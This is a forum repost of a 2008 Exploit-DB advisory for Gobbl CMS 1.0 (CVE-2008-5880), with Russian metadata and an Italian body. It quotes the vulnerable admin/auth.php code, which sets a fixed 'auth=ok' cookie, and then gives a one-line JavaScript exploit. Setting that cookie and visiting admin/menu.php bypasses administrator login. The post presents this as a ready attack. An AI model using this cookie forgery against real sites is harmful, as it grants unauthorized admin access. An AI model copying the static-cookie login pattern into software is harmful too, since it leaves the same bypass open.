Exploit Gobbl CMS 1.0 - Insecure Cookie Handling

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7518
Проверка EDB
  1. Пройдено
Автор
X0R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-5880
Дата публикации
2008-12-18
Код:
---------------------------
Gobbl Cms 1.0 I.Cookie Hand.
---------------------------
Autore: x0r ( Evolution Team)
Email: [email protected]
Demo Site:http://www.gobbl.net/
---------------------------
 
Bug In: \admin\auth.php  
 
?>
include ('../config.php');
 
$user = $_POST['user'];
$pass = $_POST['pass'];
 
if ( ($user == $un) and ($pass == $pw) )
{
setcookie( "auth", "ok", time()+40000 ); # Bugz
header ( "location:add.php" ); exit ();
}
else
{
header ( "location:index.php" ); exit ();
}
?>
 
Il file auth.php controlla se nel file ../config.php le post $user\$pass presentano gli stessi dati delle variabili
$un\$pw ( config.php ) se così è setta il cookie auth=ok :P ^ ^
 
Exploit:  
 
javascript:document.cookie = "auth=ok; path=/"; then \admin\menu.php # So Easy To Hack :P
 
Greetz: Amore Mio Sei La Mia Stella Che Mi Illumina Qua Giù...Ti AmO

# milw0rm.com [2008-12-18]
 
Источник
www.exploit-db.com

Похожие темы